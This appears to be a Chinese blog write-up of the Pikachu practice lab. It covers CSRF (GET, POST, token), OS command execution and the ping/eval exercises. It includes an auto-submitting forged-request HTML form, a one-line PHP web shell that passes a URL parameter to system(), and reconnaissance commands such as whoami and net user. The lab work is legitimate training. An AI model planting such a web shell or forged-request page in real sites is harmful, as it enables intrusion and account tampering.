当前位置: 代码迷 >> 综合 >> Pikachu CSRF GET/POST/TOKE级别漏洞实战&&Pikachu exec “ping“ && exec “evel“&&OS命令执行漏洞
  详细解决方案

Pikachu CSRF GET/POST/TOKE级别漏洞实战&&Pikachu exec “ping“ && exec “evel“&&OS命令执行漏洞

热度:92   发布时间:2024-02-09 22:07:59.0

Pikachu CSRF GET/POST/TOKE级别漏洞实战&&Pikachu exec “ping” && exec “evel”&&OS命令执行漏洞

CSRF(get) login
在这里插入图片描述
tips(再点一下关闭)这里一共有这么些用户vince/allen/kobe/grady/kevin/lucy/lili,密码全部是123456
在这里插入图片描述
先抓包
在这里插入图片描述
修改个个人信息看看
在这里插入图片描述
直接在burpsuite里改add为hackerhah
在这里插入图片描述
CSRF(POST)

在这里插入图片描述
这里使用别人写的script,放到pikachu-master/ vul/csrf上,代码如下
当提交方式是post时
和xss的post型攻击差不多,攻击者构造一个自己的攻击站点,当lucy点击时,就会向服务器提交post修改个人信息

<html>
<head>
<script>
window.onload = function() {document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpos/csrf_post_edit.php"><input id="sex" type="text" name="sex" value="girl" /><input id="phonenum" type="text" name="phonenum" value="12345678922" /><input id="add" type="text" name="add" value="hacker" /><input id="email" type="text" name="email" value="lucy@pikachu.com" /><input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

不知道上面原因一点击提交就会跳到http://192.168.21.10/pikachu-master/vul/csrf/csrfpost/csrf_get_login.php里面,虽然post.html里面写的是
http://192.168.21.10/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php
在这里插入图片描述
CSRF Token login
查看源代码:
在这里插入图片描述
抓包,看到有token参数。
token:随机码,每次请求,都增加一个随机码,后台每次对这个随机码进行验证
在这里插入图片描述
在这里插入图片描述
与前面比较,这里多了一个Token,如果后台对提交的Token进行了验证,由于Token是随机的,我们就无法伪造URL了

看下控制台源码,看下这个表单,每次点击修改个人信息 都会去访问 token_get_edit_.php 这个文件,这个文件就会生成一个token,
value就是后端发过来的,type是隐藏的额,在前端看不到,但是在源码中能看到。

每次点提交,token也会被提交到后台,后台会对token进行验证,如果和当前session里面的token相等,才会让你提交。

OS命令执行漏洞:

Ipconfig ifconfig
Whoami
Net user
index2.php

<?php
$action = $_GET['cmd'];
echo "<pre>";
echo system($action);
echo "</pre>";
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Pikachu exec “ping” && exec "evel"

Pikachu exec "ping"

远程命令执行,我们直接输入: 127.0.0.1我们发现出现了乱码
在这里插入图片描述

  1. 同时按"win + R" ,并输入 regedit 进入注册表
  2. 找到 HKEY_CURRENT_USER\Console%SystemRoot%_system32_cmd.exe,如果该项下已存在 CodePage 项,则把值改为十进制 “65001”,点击确定即可;如果不存在,在该项下新建一个 DWORD(32位值),命名为 “CodePage”,值设为 “65001”。然后关闭注册表管理器。
    然后再重新输入命令查看结果:
    在这里插入图片描述
    exec “eval”:

后台会执行响应的 php 代码,我们可以输入下面的代码:phpinfo();
在这里插入图片描述
后续操作请持续关注哦!!!
了解更多请关注下列公众号:

? ? ? ? ? ? ? ? ? ? ? ? ? ? ?????????
在这里插入图片描述
? ? ? ? ? ? ? ? ? ? ? ? ? ? ?????????

  相关解决方案